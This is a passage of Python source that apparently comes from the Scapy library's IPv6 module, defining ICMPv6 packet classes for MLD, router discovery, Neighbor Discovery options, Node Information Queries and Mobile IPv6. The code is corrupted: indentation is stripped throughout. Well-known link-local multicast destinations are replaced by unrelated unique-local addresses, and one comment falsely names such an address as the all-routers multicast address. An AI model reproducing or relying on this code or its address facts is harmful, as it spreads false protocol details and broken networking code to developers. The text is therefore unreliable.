overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
# implement hashret and answers
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (fc00:e968:6179::de52:7100), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: { "dst": "fdf8:f53e:61e4::18", "hlim": 1, "nh": 58}}
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "fdf8:f53e:61e4::18"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "fdf8:f53e:61e4::18"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
icmp6ndopts = { 1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recusive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
#11: Do Me,
#12: Do Me,
#13: Do Me,
#14: Do Me,
#15: Do Me,
#16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
#18: Do Me,
#19: Do Me,
#20: Do Me,
#21: Do Me,
#22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA"
}
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self,p):
if len(p) > 1:
return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ ByteField("type",None),
FieldLenField("len",None,length_of="data",fmt="B",
adjust = lambda pkt,x: x+2),
StrLenField("data","",
length_from = lambda pkt: pkt.len-2) ]
# NOTE: len includes the type and len fields. Expressed in units of 8 bytes
# TODO: Revisit the use of ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY) ]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ ByteField("type",3),
ByteField("len",4),
ByteField("prefixlen",None),
BitField("L",1,1),
BitField("A",1,1),
BitField("R",0,1),
BitField("res1",0,5),
XIntField("validlifetime",0xffffffffL),
XIntField("preferredlifetime",0xffffffffL),
XIntField("res2",0x00000000),
IP6Field("prefix","::") ]
def mysummary(self):
return self.sprintf("%name% %prefix%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
self.cur_shift = cur_shift
def getfield(self, pkt, s):
l = self.length_from(pkt)
i = self.m2i(pkt, s[:l])
return s[l:],i
def m2i(self, pkt, m):
s = None
try: # It can happen we have sth shorter than 40 bytes
s = self.cls(m)
except:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = str(x)
l = len(s)
r = (l + self.cur_shift) % 8
l = l - r
return s[:l]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# Add a post_build to recompute the length (in multiples of 8 bytes)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ ByteField("type",4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust = lambda pkt,x:(x+8)/8),
StrFixedLenField("res", "\x00"*6, 6),
TruncPktLenField("pkt", "", IPv6, 8,
length_from = lambda pkt: 8*pkt.len-8) ]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ ByteField("type",5),
ByteField("len",1),
XShortField("res",0),
IntField("mtu",1280)]
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0) ]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ ByteField("type",7),
ByteField("len",1),
ShortField("res", 0),
IntField("advint", 0) ]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ ByteField("type",8),
ByteField("len",1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ ByteField("type",17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address" }),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::") ]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
fields_desc = [ ByteField("type",18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::") ]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router",
6: "No preifx info available for AP identified by the LLA",
7: "No fast handovers support for AP identified by the LLA" }
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
fields_desc = [ ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY) ] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::") ]
class IP6PrefixField(IP6Field):
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8*(pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
l = self.length_from(pkt)
p = s[:l]
if l < 16:
p += '\x00'*(16-l)
return s[l:], self.m2i(pkt,p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
l = pkt.len
if x is None:
x = "::"
if l is None:
l = 1
x = inet_pton(socket.AF_INET6, x)
if l is None:
return x
if l in [0, 1]:
return ""
if l in [2, 3]:
return x[:8*(l-1)]
return x + '\x00'*8*(l-3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ ByteField("type",24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust = lambda pkt,x: x/8 + 1),
ByteField("plen", None),
BitField("res1",0,3),
BitField("prf",0,2),
BitField("res2",0,3),
IntField("rtlifetime", 0xffffffff),
IP6PrefixField("prefix", None) ]
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust = lambda pkt,x: 2*x+1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48) ]
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ ByteEnumField("type", 133, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ ByteEnumField("type", 134, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
ByteField("chlim",0),
BitField("M",0,1),
BitField("O",0,1),
BitField("H",0,1),
BitEnumField("prf",1,2, { 0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low" } ), # RFC 4191
BitField("P",0,1),
BitField("res",0,2),
ShortField("routerlifetime",1800),
IntField("reachabletime",0),
IntField("retranstimer",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ ByteEnumField("type",135, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ ByteEnumField("type",136, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
BitField("R",1,1),
BitField("S",0,1),
BitField("O",1,1),
XBitField("res",0,29),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ ByteEnumField("type",137, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
XIntField("res",0),
IP6Field("tgt","::"),
IP6Field("dst","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
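# Usage sketch (not from the original source; addresses are illustrative):
# ND options are simply stacked after the ND message:
#   ns = IPv6(src="fe80::1", dst="ff02::1:ff00:2")/ICMPv6ND_NS(tgt="2001:db8::2") \
#        /ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
#   ra = IPv6(src="fe80::1", dst="ff02::1")/ICMPv6ND_RA() \
#        /ICMPv6NDOptPrefixInfo(prefix="2001:db8::", prefixlen=64)/ICMPv6NDOptMTU(mtu=1500)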
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ ByteField("type",9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust = lambda pkt,x: 2*x+1),
StrFixedLenField("res", "\x00"*6, 6),
IP6ListField("addrlist", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be nice to take the L2 address
#   requested in the mandatory target lladdr option and use it as the
#   Ethernet destination address if no address is specified
# - that does not seem very practical if the user has to specify all
#   the options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ ByteEnumField("type",141, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
# Required options: target lladdr, target address list
# Other valid options: MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ ByteEnumField("type",142, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
# dnsrepr2names(). Should be deactivable.
icmp6_niqtypes = { 0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address" }
class _ICMPv6NIHashret:
def hashret(self):
return self.nonce
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
# Compute the NI group Address. Can take a FQDN as input parameter
def computeNIGroupAddr(name):
import md5
name = name.lower().split(".")[0]
record = chr(len(name))+name
h = md5.new(record)
h = h.digest()
addr = "fdf8:f53e:61e4::18:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specific
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
#   if not overridden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
#   if not overridden
# - Name in the other cases: code is set to 1, if not overridden by user
#
# Internal storage is not only the value but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if type(x) is str:
if x and x[-1] == '\x00': # stupid heuristic
return x
x = [x]
res = []
for n in x:
termin = "\x00"
if n.count('.') == 0: # single-component gets one more
termin += '\x00'
n = "".join(map(lambda y: chr(len(y))+y, n.split("."))) + termin
res.append(n)
return "".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
and returns a list of DNS names contained in it.
    If the provided string is already in printable format
    (does not end with a null character), a one-element list
    is returned. Result is a list.
"""
res = []
cur = ""
while x:
l = ord(x[0])
x = x[1:]
if l == 0:
if cur and cur[-1] == '.':
cur = cur[:-1]
res.append(cur)
cur = ""
if x and ord(x[0]) == 0: # single component
x = x[1:]
continue
if l & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
else:
cur += x[:l]+"."
x = x[l:]
return res
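# Worked example (illustrative, not from the original source):
# names2dnsrepr("node.example") yields "\x04node\x07example\x00", and
# dnsrepr2names() of that string returns ["node.example"]. A single-component
# name gets an extra null terminator: names2dnsrepr("node") == "\x04node\x00\x00".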
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
        if type(x) is tuple and type(x[0]) is int:
return x
val = None
try: # Try IPv6
inet_pton(socket.AF_INET6, x)
val = (0, x)
except:
try: # Try IPv4
inet_pton(socket.AF_INET, x)
val = (2, x)
except: # Try DNS
if x is None:
x = ""
x = names2dnsrepr(x)
val = (1, x)
return val
def i2repr(self, pkt, x):
t,val = x
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
weird = None
while val:
l = ord(val[0])
val = val[1:]
if l == 0:
if (len(res) > 1 and val): # fqdn with data behind
weird = val
elif len(val) > 1: # single label with data behind
weird = val[1:]
break
res.append(val[:l]+".")
val = val[l:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return "", (1, s)
def addfield(self, pkt, s, val):
if ((type(val) is tuple and val[1] is None) or
val is None):
val = (1, "")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None) ]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
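# Usage sketch (values are illustrative, not from the original source): the
# data field guesses the kind of value it is given and the code is derived
# from it:
#   ICMPv6NIQueryIPv6(data="2001:db8::1")   # -> code 0 (IPv6 address)
#   ICMPv6NIQueryIPv4(data="192.0.2.1")     # -> code 2 (IPv4 address)
#   ICMPv6NIQueryName(data="node.example")  # -> code 1 (DNS name)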
_nireply_code = { 0: "Successful Reply",
                  1: "Response Refusal",
                  2: "Unknown query type" }
_nireply_flags = { 1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses" }
# Internal repr is one of those :
# (0, "some string") : unknow qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decode it for user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if type(x) is not tuple:
if pkt is not None:
qtype = getattr(pkt, "qtype")
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if type(x) is str: # listify the string
x = [x]
if type(x) is list and x and type(x[0]) is not int: # ttl was omitted : use 0
x = [0] + x
ttl = x[0]
names = x[1:]
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if type(x) is str:
x = [x] # User directly provided an IP, instead of list
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
def addttl(x):
if type(x) is str:
return (0, x)
return x
return (qtype, map(addttl, x))
return (qtype, x)
def addfield(self, pkt, s, val):
t,tmp = val
if tmp is None:
tmp = ""
if t == 2:
ttl,dnsstr = tmp
return s+ struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET6, y), tmp))
elif t == 4:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET, y), tmp))
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, "")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
elif qtype == 2:
if len(s) < 4:
return s, (0, "")
ttl = struct.unpack("!I", s[:4])[0]
return "", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return "", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if type(x) is tuple and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl,l = val
l = dnsrepr2names(l)
return "ttl:%d %s" % (ttl, ", ".join(l))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda (x,y): "(%d, %s)" % (x, y), val)))
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = ord(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = ord(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
